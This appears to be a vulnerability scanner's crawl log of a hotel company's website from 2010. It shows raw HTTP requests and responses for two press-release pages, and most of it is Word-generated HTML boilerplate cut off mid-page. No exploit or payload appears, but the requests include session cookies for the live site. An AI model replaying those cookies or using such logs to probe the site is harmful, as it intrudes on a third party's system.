mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="2050"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>

<body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'>

<div class=Section1>

<p class=MsoNormal><span style='font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype
id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="_..
- /pdfs/press/html/Spark-1209/

/pdfs/press/html/Spark-1209/

http://www.kimptonhotels.com/pdfs/press/html/Spark-1209/

Request

GET /pdfs/press/html/Spark-1209/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Spark-1209/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 33222
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>2</o:TotalTime> <o:LastPrinted>2009-12-08T19:03:00Z</o:LastPrinted> <o:Created>2010-01-04T21:55:00Z</o:Created> <o:LastSaved>2010-01-04T21:55:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>755</o:Words> <o:Characters>4309</o:Characters> <o:Lines>35</o:Lines> <o:Paragraphs>8</o:Paragraphs> <o:CharactersWithSpaces>5291</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:28848037; mso-list-type:hybrid; mso-list-template-ids:182875624 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l1:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2 {mso-list-id:854463416; mso-list-type:hybrid; mso-list-template-ids:-2144938804 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l3 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l3:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l3:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l5 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6 {mso-list-id:1707218260; mso-list-type:hybrid; mso-list-template-ids:1001260830 1676557052 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l6:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l7 {mso-list-id:1929657465; mso-list-type:hybrid; mso-list-template-ids:1347988556 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]></span></p><p class=MsoNormal><span style='font-size:8.0pt'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>ChloeMata Crane / 212-982-8300 x104 / <a href="mailto:cmcrane@baltzco.com">cmcrane@baltzco.com</a>&nbsp;&nbsp;&nbsp;&..
- /pdfs/press/html/Santa-Paws-1209/

/pdfs/press/html/Santa-Paws-1209/

http://www.kimptonhotels.com/pdfs/press/html/Santa-Paws-1209/

Request

GET /pdfs/press/html/Santa-Paws-1209/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Santa-Paws-1209/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26768
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>2</o:TotalTime> <o:LastPrinted>2009-11-19T19:26:00Z</o:LastPrinted> <o:Created>2009-12-09T21:15:00Z</o:Created> <o:LastSaved>2009-12-09T21:15:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>623</o:Words> <o:Characters>3554</o:Characters> <o:Lines>29</o:Lines> <o:Paragraphs>7</o:Paragraphs> <o:CharactersWithSpaces>4364</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; 